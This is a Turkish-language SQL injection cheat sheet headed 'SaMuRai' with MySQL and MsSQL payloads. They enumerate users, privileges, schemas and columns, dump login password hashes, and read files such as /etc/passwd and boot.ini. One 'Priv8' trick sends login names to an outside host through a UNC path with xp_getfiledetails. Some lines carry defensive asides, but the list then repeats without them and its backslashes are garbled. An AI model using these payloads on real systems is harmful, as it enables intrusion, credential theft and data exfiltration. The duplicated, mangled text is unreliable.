SaMuRai
~MySQL Injection Codes / Püf Noktaları
System User’ı Göstermek > SELECT system_user();
MySQL Userlarını Göstermek > SELECT user FROM mysql.user; -- priv Bi Koddur (H).
İzinleri Göstermek > SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
DBLeri Listeletmek > SELECT schema_name FROM information_schema.schemata;
Colonları Listeletmek > SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ’mysql’ AND table_schema != ’information_schema’
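Tabloları Listeletmek > SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ’mysql’ AND table_schema != ’information_schema’
Dosya Okumak > UNION ALL SELECT LOAD_FILE(’/etc/passwd’) - privdi, public oldu. (LOAD_FILE yalnızca FILE yetkisi olan hesaplarda çalışır ve secure_file_priv ayarıyla kısıtlanır; uygulama hesabına FILE yetkisi verilmemelidir.)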
~MsSQL Injection Codes / Püf Noktaları
userları listeletmek > SELECT name FROM master..syslogins
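şifre saltlarını listeletmek > SELECT name, password FROM master..sysxlogins (password sütunu salt’lı parola hash’ini tutar; sysxlogins yalnızca SQL Server 2000’de vardır, sonraki sürümlerde kaldırılmıştır)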
Current Userın admin olup olmadığını Gösterir ( 1 ise admin 0 ise değil) > SELECT is_srvrolemember(’sysadmin’);
DbLeri Listeletmek > SELECT name FROM master..sysdatabases;
Colonları Listeletmek > SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’so****ble’;
Tabloları Listeletmek > SELECT name FROM master..sysobjects WHERE xtype = ’U’;
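DNS ISTEMCISI YARATMAK (Priv8) > declare @host varchar(800); select @host = name FROM master..syslogins; exec(’master..xp_getfiledetails ’’\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\’ + @host + ’\\\\\\\\\\\\\\\\c$\\\\\\\\\\\\\\\\boot.ini’’ ’); (xp_getfiledetails belgelenmemiş bir extended procedure’dür ve SQL Server 2005’ten itibaren kaldırılmıştır; veritabanı sunucusundan dışarıya giden SMB/DNS trafiğinin engellenmesi bu yolla veri sızdırılmasını önler.)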
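Local File Access Yapmak (BULK INSERT için bulkadmin veya sysadmin rolü gerekir; uygulama hesabına bu roller verilmemelidir) > CREATE TABLE mydata (line varchar(8000));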
BULK INSERT mydata FROM ’c:\\\\\\\\\\\\\\\\boot.ini’;
DROP TABLE mydata;
Hostname-IP adresi öğrenmek > SELECT HOST_NAME() (HOST_NAME() bağlanan istemcinin bildirdiği iş istasyonu adını döndürür; IP adresi vermez)
MySQL Userlarını Göstermek > SELECT user FROM mysql.user; -- priv Bi Koddur (H).
İzinleri Göstermek > SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
DBLeri Listeletmek > SELECT schema_name FROM information_schema.schemata;
Colonları Listeletmek > SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ’mysql’ AND table_schema != ’information_schema’
Tabloları Listeletmek > SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ’mysql’ AND table_schema != ’information_schema’
Dosya Okumak > UNION ALL SELECT LOAD_FILE(’/etc/passwd’) - privdi, public oldu
~MsSQL Injection Codes / Püf Noktaları
userları listeletmek > SELECT name FROM master..syslogins
şifre saltlarını listeletmek > SELECT name, password FROM master..sysxlogins
Current Userın admin olup olmadığını Gösterir ( 1 ise admin 0 ise değil) > SELECT is_srvrolemember(’sysadmin’);
DbLeri Listeletmek > SELECT name FROM master..sysdatabases;
Colonları Listeletmek > SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’so****ble’;
Tabloları Listeletmek > SELECT name FROM master..sysobjects WHERE xtype = ’U’;
DNS ISTEMCISI YARATMAK (Priv8) > declare @host varchar(800); select @host = name FROM master..syslogins; exec(’master..xp_getfiledetails ’’\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\’ + @host + ’\\\\\\\\\\\\\\\\c$\\\\\\\\\\\\\\\\boot.ini’’ ’);
Local File Access Yapmak > CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM ’c:\\\\\\\\\\\\\\\\boot.ini’;
DROP TABLE mydata;
Hostname-IP adresi öğrenmek > SELECT HOST_NAME()